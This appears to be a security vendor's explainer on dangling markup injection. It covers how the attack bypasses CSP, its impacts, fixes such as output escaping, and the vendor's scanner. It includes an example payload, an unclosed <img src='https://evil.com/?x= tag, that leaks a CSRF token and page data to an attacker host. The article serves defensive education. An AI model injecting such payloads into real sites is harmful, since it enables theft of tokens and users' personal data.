Dangling Markup Injection

What Is Dangling Markup Injection?

Dangling Markup Injection is a technique that bypasses Content Security Policy (CSP) when user input is reflected in HTML without proper encoding. Instead of injecting a <script> tag (which CSP blocks), the attacker injects an unclosed tag like <img src='https://evil.com/?x= that captures everything between the injection point and the next matching quote character.

How It Works

The application reflects a parameter without HTML encoding:

<div class="greeting">Hello, <img src='https://evil.com/?x=!</div>
<input type="hidden" name="csrf_token" value="abc123">
<div class="account">Balance: $4,200</div>

The unclosed <img src=' captures everything up to the next single quote — including the CSRF token and account balance — as part of the URL:

https://evil.com/?x=!</div><input type="hidden" name="csrf_token" value="abc123"><div class="account">Balance: $4,200</div>...

The browser sends a request to evil.com with all this data as a query parameter.

Real-World Impact

• CSRF token theft — steal anti-CSRF tokens to perform state-changing actions
• PII exfiltration — capture account data, emails, phone numbers displayed on the page
• CSP bypass — works even with strict CSP that blocks all inline scripts
• Session data leakage — any sensitive data rendered after the injection point

How to Fix

HTML-encode all reflected output:

from markupsafe import escape
output = f"Hello, {escape(user_input)}!"

Use framework auto-escaping (React JSX, Django templates with {% autoescape on %}).

Implement strict CSP with base-uri 'none' to prevent base tag injection.

What VibeWShield Detects

VibeWShield's Dangling Markup scanner injects an <img src= payload with a unique canary domain into reflected parameters. If the unclosed tag appears unencoded in the response, the finding confirms that page content after the injection point can be exfiltrated. Only 1 request per parameter — zero risk to the target.